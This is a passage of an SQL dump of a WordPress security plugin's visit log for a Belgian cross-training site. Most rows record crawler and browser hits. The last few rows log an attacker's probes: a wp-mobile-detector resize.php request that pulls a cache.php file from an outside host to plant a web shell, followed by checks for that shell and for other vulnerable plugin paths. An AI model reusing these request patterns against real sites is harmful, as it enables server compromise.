(77182, 1499858931.412251, 1463955851, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(77183, 1499858931.897522, 1463955851, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(77184, 1499858932.413343, 1463955851, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(77185, 1499863503.784927, 1123632645, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77186, 1499868686.977125, 1123632645, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77187, 1499868687.505903, 1123632645, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77188, 1499869932.403585, 1532393936, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/603.2.5 (KHTML, like Gecko) Version/10.1.1 Safari/603.2.5'),
(77189, 1499881332.002307, 2637637429, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(77190, 1499883277.473062, 2509962753, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'https://www.google.be/', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36 Edge/14.14393'),
(77191, 1499886822.797156, 676177742, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-limelette/', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(77192, 1499888442.311924, 1332604279, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www.crosstrainingcenter.be/le-cross-training/', 'Mozilla/5.0 (Linux; Android 6.0.1; SM-J510FN Build/MMB29M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.125 Mobile Safari/537.36'),
(77193, 1499891992.610922, 3325718858, 0, 1, 0, 0, 1, 'http://crosstrainingcenter.be/forum.php', 'http://crosstrainingcenter.be/forum.php', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)'),
(77194, 1499892500.250771, 2637637530, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/contact/', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(77195, 1499892500.995103, 2637637530, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/contact/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(77196, 1499893542.869709, 584303793, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/?author=2', '', ''),
(77197, 1499912058.186765, 2499535434, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/comments/feed/', '', 'AwarioRssBot/1.0 (+https://awario.com/bots.html; bots@awario.com)'),
(77198, 1499919266.446441, 2760155461, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/)'),
(77199, 1499920168.573780, 3657082077, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)'),
(77200, 1499921397.146341, 1539836988, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/revslider/css/tipsy.css', 'http://www.crosstrainingcenter.be/wp-content/plugins/revslider/css/tipsy.css', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36'),
(77201, 1499926167.760377, 1123632580, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77202, 1499926168.246261, 1123632580, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77203, 1499927706.705724, 1123632580, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77204, 1499936673.534614, 3024883592, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (Windows NT 5.1; rv:6.0.2) Gecko/20100101 Firefox/6.0.2'),
(77205, 1499936673.632421, 3024883600, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)'),
(77206, 1499936673.865960, 3024883605, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (Windows NT 5.1; rv:6.0.2) Gecko/20100101 Firefox/6.0.2'),
(77207, 1499936838.437272, 1123632580, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77208, 1499939423.969713, 3657082077, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/le-cross-training/', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)'),
(77209, 1499943389.994130, 1332604279, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www.crosstrainingcenter.be/le-cross-training/', 'Mozilla/5.0 (Linux; Android 6.0.1; SM-J510FN Build/MMB29M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.125 Mobile Safari/537.36'),
(77210, 1499944327.389097, 3250483965, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'https://www.google.be/', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36'),
(77211, 1499944328.791713, 3250483965, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www.crosstrainingcenter.be/les-seances-namur/', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36'),
(77212, 1499948759.407544, 3657082077, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/notre-philosophie/', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)'),
(77213, 1499948761.808476, 520974916, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)'),
(77214, 1499948762.981804, 1463821037, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_2 like Mac OS X) AppleWebKit/603.2.4 (KHTML, like Gecko) Mobile/14F89 [FBAN/FBIOS;FBAV/100.0.0.43.70;FBBV/64200226;FBDV/iPhone9,3;FBMD/iPhone;FBSN/iOS;FBSV/10.3.2;FBSS/2;FBCR/Proximus;FBID/phone;FBLC/fr_FR;FBOP/5;FBRV/0]'),
(77215, 1499948773.208025, 1463821037, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/le-cross-training/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_2 like Mac OS X) AppleWebKit/603.2.4 (KHTML, like Gecko) Mobile/14F89 [FBAN/FBIOS;FBAV/100.0.0.43.70;FBBV/64200226;FBDV/iPhone9,3;FBMD/iPhone;FBSN/iOS;FBSV/10.3.2;FBSS/2;FBCR/Proximus;FBID/phone;FBLC/fr_FR;FBOP/5;FBRV/0]'),
(77216, 1499948792.300967, 1463821037, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/notre-philosophie/', 'http://www.crosstrainingcenter.be/le-cross-training/', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_2 like Mac OS X) AppleWebKit/603.2.4 (KHTML, like Gecko) Mobile/14F89 [FBAN/FBIOS;FBAV/100.0.0.43.70;FBBV/64200226;FBDV/iPhone9,3;FBMD/iPhone;FBSN/iOS;FBSV/10.3.2;FBSS/2;FBCR/Proximus;FBID/phone;FBLC/fr_FR;FBOP/5;FBRV/0]'),
(77217, 1499948802.799729, 1463821037, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'http://www.crosstrainingcenter.be/notre-philosophie/', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_2 like Mac OS X) AppleWebKit/603.2.4 (KHTML, like Gecko) Mobile/14F89 [FBAN/FBIOS;FBAV/100.0.0.43.70;FBBV/64200226;FBDV/iPhone9,3;FBMD/iPhone;FBSN/iOS;FBSV/10.3.2;FBSS/2;FBCR/Proximus;FBID/phone;FBLC/fr_FR;FBOP/5;FBRV/0]'),
(77218, 1499952256.125016, 3154453301, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_2 like Mac OS X) AppleWebKit/603.2.4 (KHTML, like Gecko) Version/10.0 Mobile/14F89 Safari/602.1'),
(77219, 1499952256.915242, 3154453301, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(77220, 1499952257.381379, 3154453301, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(77221, 1499952257.914221, 3154453301, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(77222, 1499952258.367458, 3154453301, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(77223, 1499952258.875908, 3154453301, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(77224, 1499952259.420047, 3154453301, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(77225, 1499952259.876426, 3154453301, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(77226, 1499952260.357721, 3154453301, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(77227, 1499952260.817224, 3154453301, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(77228, 1499952261.275184, 3154453301, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(77229, 1499957038.215342, 2637637429, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(77230, 1499959743.365289, 3024883465, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)'),
(77231, 1499960403.761678, 3154453301, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_2 like Mac OS X) AppleWebKit/603.2.4 (KHTML, like Gecko) Version/10.0 Mobile/14F89 Safari/602.1'),
(77232, 1499960750.934437, 1538656104, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_5) AppleWebKit/603.2.4 (KHTML, like Gecko)'),
(77233, 1499960751.405893, 1538656104, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(77234, 1499960751.983472, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(77235, 1499960752.838192, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(77236, 1499960753.425401, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(77237, 1499960753.927197, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(77238, 1499960754.460294, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(77239, 1499960755.114121, 1538656104, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_0 like Mac OS X) AppleWebKit/602.1.38 (KHTML, like Gecko) Version/10.0 Mobile/14A300 Safari/602.1'),
(77240, 1499960755.657715, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(77241, 1499960756.088524, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(77242, 1499960756.708875, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)');
INSERT INTO `wp_wfHits` (`id`, `ctime`, `IP`, `jsRun`, `is404`, `isGoogle`, `userID`, `newVisit`, `URL`, `referer`, `UA`) VALUES
(77243, 1499960757.338692, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(77244, 1499960757.847955, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(77245, 1499960758.373598, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(77246, 1499962555.283545, 3657082077, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)'),
(77247, 1499965085.742983, 3657082077, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/en-images/', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)'),
(77248, 1499968355.265529, 3657082077, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/lequipe/', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)'),
(77249, 1499968525.428999, 1123634077, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77250, 1499970501.079174, 1375113052, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_2 like Mac OS X) AppleWebKit/603.2.4 (KHTML, like Gecko) Version/10.0 Mobile/14F89 Safari/602.1'),
(77251, 1499970501.672314, 1375113052, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(77252, 1499970502.332263, 1375113052, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(77253, 1499970502.814649, 1375113052, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(77254, 1499970503.222071, 1375113052, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(77255, 1499970503.706529, 1375113052, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(77256, 1499970504.247993, 1375113052, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(77257, 1499970504.725126, 1375113052, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(77258, 1499970505.173638, 1375113052, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(77259, 1499970505.692731, 1375113052, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(77260, 1499970506.189495, 1375113052, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(77261, 1499973285.953749, 3657082077, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/contact/', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)'),
(77262, 1499976492.930811, 3264835941, 0, 0, 0, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; oBot/2.3.1; http://filterdb.iss.net/crawler/)'),
(77263, 1499976493.651984, 3264835941, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; oBot/2.3.1; http://filterdb.iss.net/crawler/)'),
(77264, 1499976494.188621, 3264835941, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; oBot/2.3.1; http://filterdb.iss.net/crawler/)'),
(77265, 1499976494.595972, 3264835941, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; oBot/2.3.1; http://filterdb.iss.net/crawler/)'),
(77266, 1499981918.124314, 3657082077, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/266-2/', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)'),
(77267, 1499982839.431530, 1123632645, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77268, 1499983157.160901, 1161474618, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; ips-agent)'),
(77269, 1499983158.722524, 1161474618, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; ips-agent)'),
(77270, 1499983160.449314, 1161474618, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/contact/', '', 'Mozilla/5.0 (compatible; ips-agent)'),
(77271, 1499983162.362943, 1161474618, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/le-cross-training/', '', 'Mozilla/5.0 (compatible; ips-agent)'),
(77272, 1499983164.604777, 1161474618, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/notre-philosophie/', '', 'Mozilla/5.0 (compatible; ips-agent)'),
(77273, 1499983167.653090, 1161474618, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/5.0 (compatible; ips-agent)'),
(77274, 1499983170.939882, 1161474618, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/en-images/', '', 'Mozilla/5.0 (compatible; ips-agent)'),
(77275, 1499983174.150760, 1161474618, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/lequipe/', '', 'Mozilla/5.0 (compatible; ips-agent)'),
(77276, 1499983178.247992, 1161474618, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/266-2/', '', 'Mozilla/5.0 (compatible; ips-agent)'),
(77277, 1499984983.263119, 1123632645, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77278, 1499986520.481365, 2957688868, 0, 0, 0, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'DomainCrawler/3.0 (info@domaincrawler.com; http://www.domaincrawler.com/crosstrainingcenter.be)'),
(77279, 1499986522.218084, 2957688868, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'DomainCrawler/3.0 (info@domaincrawler.com; http://www.domaincrawler.com/crosstrainingcenter.be)'),
(77280, 1499986523.198547, 2957688868, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'DomainCrawler/3.0 (info@domaincrawler.com; http://www.domaincrawler.com/crosstrainingcenter.be)'),
(77281, 1499986525.351279, 2957688868, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/lequipe/', '', 'DomainCrawler/3.0 (info@domaincrawler.com; http://www.domaincrawler.com/crosstrainingcenter.be)'),
(77282, 1499986526.305627, 2957688868, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/contact/', '', 'DomainCrawler/3.0 (info@domaincrawler.com; http://www.domaincrawler.com/crosstrainingcenter.be)'),
(77283, 1499986526.307888, 2957688868, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/notre-philosophie/', '', 'DomainCrawler/3.0 (info@domaincrawler.com; http://www.domaincrawler.com/crosstrainingcenter.be)'),
(77284, 1499986526.309415, 2957688868, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/266-2/', '', 'DomainCrawler/3.0 (info@domaincrawler.com; http://www.domaincrawler.com/crosstrainingcenter.be)'),
(77285, 1499986527.428259, 2957688868, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', '', 'DomainCrawler/3.0 (info@domaincrawler.com; http://www.domaincrawler.com/crosstrainingcenter.be)'),
(77286, 1499986527.456070, 2957688868, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/en-images/', '', 'DomainCrawler/3.0 (info@domaincrawler.com; http://www.domaincrawler.com/crosstrainingcenter.be)'),
(77287, 1499986527.457868, 2957688868, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/le-cross-training/', '', 'DomainCrawler/3.0 (info@domaincrawler.com; http://www.domaincrawler.com/crosstrainingcenter.be)'),
(77288, 1499992053.858162, 676177789, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances/', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(77289, 1499992638.375462, 1123632645, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77290, 1499995152.804793, 3657082077, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/sitemap.xml', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)'),
(77291, 1500000741.723350, 2637637429, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(77292, 1500006087.516093, 1123632645, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77293, 1500007444.688405, 96753435, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/)'),
(77294, 1500007445.070198, 2303381409, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/feed/', '', 'Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/)'),
(77295, 1500012307.881760, 3373404845, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:50.0) Gecko/20100101 Firefox/50.0'),
(77296, 1500012309.299992, 3373404845, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/wp-mobile-detector/resize.php?src=http://www.laptopscreenrepair.net.au/search/cache.php', '', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:50.0) Gecko/20100101 Firefox/50.0'),
(77297, 1500012310.133221, 3373404845, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/plugins/wp-mobile-detector/cache/cache.php', '', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:50.0) Gecko/20100101 Firefox/50.0'),
(77298, 1500012311.801212, 3373404845, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/plugins/revslider/temp/update_extract/revslider/cache.php', '', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:50.0) Gecko/20100101 Firefox/50.0'),
(77299, 1500012313.065446, 3373404845, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/wp-symposium/server/php/index.php', '', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:50.0) Gecko/20100101 Firefox/50.0'),
